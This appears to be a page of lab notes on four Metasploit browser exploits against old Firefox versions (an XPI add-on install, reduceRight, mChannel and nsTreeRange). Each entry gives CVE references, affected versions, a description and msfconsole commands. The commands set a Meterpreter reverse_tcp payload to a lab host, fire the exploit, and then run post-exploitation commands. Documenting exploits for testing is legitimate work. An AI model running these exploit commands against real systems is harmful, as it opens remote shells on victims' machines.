Timeline :

Vulnerability found Jason Avery the 2007-06-27
Metasploit PoC provided the 2012-04-10

PoC provided by :

mihi

Reference(s) :

None

Affected version(s) :

All versions of Mozilla Firefox

Tested on Windows XP Pro SP3 with :

Mozilla Firefox 11.0

Description :

This exploit dynamically creates a .xpi add-on file. The resulting bootstrapped Firefox add-on is presented to the victim via a web page with. The victim’s Firefox browser will pop a dialog asking if they trust the add-on. Once the user clicks “install”, the add-on is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the add-on is marked to be “bootstrapped”. As the add-on will execute the payload after each Firefox restart, an option can be given to automatically uninstall the add-on once the payload has been executed.

Commands :

use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

Timeline :

Vulnerability discovered and reported to vendor by Chris Rohlf & Yan Ivnitskiy the 2011-06-13
Public release of the vulnerability the 2011-06-21
Metasploit PoC provided the 2011-10-12

PoC provided by :

Chris Rohlf
Yan Ivnitskiy
Matteo Memelli
dookie2000ca
sinn3r

Reference(s) :

CVE-2011-2371
EDB-ID-17974
MFSA-2011-22

Affected version(s) :

Mozilla Firefox versions before 3.6.18
Mozilla Firefox versions before 4.0.1
Thunderbird versions before 3.1.11
SeaMonkey versions before 2.2

Tested on Windows XP SP3 with :

Mozilla Firefox 3.6.16

Description :

This module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method may cause an invalid index being used, allowing abitrary remote code execution. Please note that the exploit requires a longer amount of time (compare to a typical browser exploit) in order to gain control of the machine.

Commands :

use exploit/windows/browser/mozilla_reduceright
set LHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

Timeline :

Vulnerability discovered by regenrecht and submitted to ZDI
Initial ZDI vulnerability notification to vendor the 2011-02-17
Coordinated public release of the vulnerability the 2011-04-28
Metasploit PoC provided the 2011-08-10

PoC provided by :

regenrecht
Rh0

Reference(s) :

CVE-2011-0065
OSVDB-72085
ZDI-11-158
MFSA-2011-13

Affected version(s) :

Firefox 3.6.17 and bellow
Firefox 3.5.19 and bellow
Seamonkey 2.0.14 and bellow

Tested on Windows XP SP3 with :

Mozilla Firefox 3.6.16

Description :

This module exploits an use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. (Discovered by regenrecht). This module uses heapspray with a minimal ROP chain to bypass DEP on Windows XP SP3.

Commands :

use exploit/windows/browser/mozilla_mchannel
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported to vendor by ZDI the 2011-02-02
Coordinated public release of advisory the 2011-05-09
Metasploit exploit released the 2011-07-10

PoC provided by :

regenrecht
xero

Reference(s) :

CVE-2011-0073
OSVDB-72087
ZDI-11-157
MFSA2011-13

Affected version(s) :

Firefox 3.6.16 and bellow
Firefox 3.5.18 and bellow
Seamonkey 2.0.13 and bellow

Tested on Windows XP SP3 with :

Firefox 3.6.9

Description :

This module exploits a code execution vulnerability in Mozilla Firefox 3.6.x and 3.5.x found in nsTreeSelection. By overwriting a subfunction of invalidateSelection it is possible to free the nsTreeRange object that the function currently operates on. Any further operations on the freed object can result in remote code execution. Utilizing the call setup the function provides it’s possible to bypass DEP without the need for a ROP. Sadly this exploit is still either dependent on Java or bound by ASLR because Firefox doesn’t employ any ASLR-free modules anymore.

Commands :

use exploit/windows/browser/mozilla_nstreerange
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig